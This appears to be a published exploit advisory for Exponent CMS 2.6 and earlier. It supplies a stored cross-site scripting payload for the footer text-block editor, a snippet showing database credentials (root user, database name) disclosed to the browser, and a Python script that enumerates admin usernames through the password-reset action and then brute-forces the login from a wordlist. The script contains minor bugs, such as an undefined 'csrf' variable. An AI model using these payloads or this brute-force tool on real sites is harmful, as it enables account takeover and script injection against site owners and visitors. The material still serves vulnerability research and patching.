# Exploit Title: Exponent CMS 2.6 - Multiple Vulnerabilities # Exploit Author: heinjame # Date: 22/10/2021 # Exploit Author: picaro_o # Vendor Homepage: https://www.exponentcms.org/ # Version: <=2.6 # Tested on: Linux os *Stored XSS* Affected parameter = > http://127.0.0.1:8082/expcms/text/edit/id/{id}/src/@footer (Title, Text Block) Payload = <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> ** *Database credential are disclosed in response *** POC ``` var adminerwindow = function (){ var win = window.open('/expcms/external/adminer/admin.php?server=localhost&username=root&db=exponentcms'); if (!win) { err(); } } ``` **Authentication Bruteforce* ``` import argparse import requests import sys parser = argparse.ArgumentParser() parser.add_argument("url", help="URL") parser.add_argument("Username list", help="Username List") parser.add_argument("Password list", help="Password List") pargs = parser.parse_args() host = sys.argv[1] userlist = sys.argv[2] passlist = sys.argv[3] try: readuser = open(userlist) readpass = open(passlist) except: print("Unable to load files") exit() def usernamebrute(): s = requests.Session() for username in readuser.readlines(): brute={ 'controller':(None,'users'), 'src':(None,''), 'int':(None,''), 'action':(None,'send_new_password'), 'username':(None,username.strip()), } bruteforce = s.post(host+"/index.php",files=brute) status = s.get(host+"/users/reset_password") if "administrator" in status.text: print("[+] Found username : "+ username) adminaccount = username checkpoint = True return adminaccount,checkpoint break def passwordbrute(adminaccount): s = requests.Session() s.cookies.set("csrftoken", "abc") header = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'COntent-TYpE': 'applicatiOn/x-WWW-fOrm-urlencoded1', 'Referer': host+'/login/showlogin' } for password in readpass.readlines(): brute={ 'controller':'login', 'src':'', 'int':'', 'action':'login', 'username':adminaccount, 'password':password.strip() } bruteforce = s.post(host+"/index.php",headers=header,data=brute) # print(bruteforce.text) status = s.get(host+"/login/showlogin",cookies=csrf) print(status.text) if "Invalid Username / Password" not in status.text: print("[+] Found Password : "+ password) break adminaccount,checkpoint = usernamebrute() if checkpoint == True: passwordbrute(adminaccount) else: print("Can't find username,We can't proceed sorry :(") ```